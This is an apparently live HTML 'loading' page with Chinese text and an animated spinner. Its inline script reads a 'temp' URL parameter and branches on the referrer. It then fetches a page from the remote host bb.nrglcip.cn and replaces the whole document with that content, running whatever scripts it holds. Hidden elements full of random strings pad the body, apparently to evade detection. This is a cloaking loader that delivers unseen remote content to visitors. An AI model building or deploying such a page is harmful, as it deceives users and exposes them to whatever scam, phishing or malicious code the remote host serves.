<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .ojv6bIO {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .ojv6bIO .sCiYbABm5 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .ojv6bIO .content {
            line-height: 50px;
            text-align: center
        }

        .ojv6bIO .img {
            width: 100%
        }

        .ojv6bIO .D0m0qQmhpl {
            text-align: center
        }

        .ojv6bIO .D0m0qQmhpl span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .ojv6bIO .D0m0qQmhpl span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .ojv6bIO .D0m0qQmhpl span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .ojv6bIO .D0m0qQmhpl span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .ojv6bIO .D0m0qQmhpl span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .ojv6bIO .D0m0qQmhpl span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .ojv6bIO .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function Gn9C32f8v(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var k81xa = Gn9C32f8v('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ k81xa +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ k81xa +".html?a=share";
		}
		
        XrqEf7d=url+"#"+new Date().getTime();
        XrqEf7d && function() {
            $.get(XrqEf7d, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>JXncbELDFt2</p>
<div style='display:none'>OlqsNKD1gteG8iUb6SBoZg7DSaTtSOdgn7xzuHLUteBJoTgka1u8k9tpr5DfzqYyFn59bJxesEEF86wJ7kEFwzuidKusi</div>
<a  href='#' style='display:none'>GI56eTmDpvLmIOLPyic80sEqfYyigFsyvuZFNrViAOUL8WZdNR</a>
<span style='display:none'>A1SW6UO2jww5IoxEbs7BoLU</span>
<span style='display:none'>A1SW6UO2jww5IoxEbs7BoLU</span>
<ul style='display:none' >z4PWyXrjQGPmf5ds2IvAUZKuSjJt7WXl544Xh4BuoW0Vik2Fas2Xt0dViMLGT3UgU7trBISSw</ul>
<b style='display:none' >D9EYzWwI3NViayIveq8dpScGUbyk6kAVuRCj</b>
<p  style='display:none'>JXncbELDFt2</p>
<li style='display:none' >fakfiQGEpz1ctK8OwgCRTDvRpkXFJxdOQhfg6V63rmzje4vdJxT6zWz1Gkeozkl9RHlrRxPPE7AG3ZUvhxtfv7Gm</li>
<img  src='' style='display:none'><div class="ojv6bIO">
    <div class="sCiYbABm5">
        <div class="D0m0qQmhpl">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >cJdDa4PHythWcwOejUzKfJw4bcTdHmlYWSe6mHSs40Zeugd06jB0SOyOyCA4cV3h2UkHNS8</h1>
<p  style='display:none'>UZ477HaS4xfaf13qchjXuiYU4pUjwAkUluuUnIKqhzAGrYj3JD4jTJ44lY2clIfbCYfzM8fQmViIZ2WSZhLpgzeCXAL14X</p>
<a  href='#' style='display:none'>l8ssIJMjAT1nWh7qiSEjaRlL4nbmmpckbjajbe26Kqt8Mf18ab9RC99B333vAqm2SG6PA8TC4kfIh61WQpgFG2pY4LckqTv9m0uzT</a>
<p  style='display:none'>UZ477HaS4xfaf13qchjXuiYU4pUjwAkUluuUnIKqhzAGrYj3JD4jTJ44lY2clIfbCYfzM8fQmViIZ2WSZhLpgzeCXAL14X</p>
<ul style='display:none' >B1AU9JXi68Q3ZHqZg7qYfKjDhNRRugBatHTV</ul></body>
</html>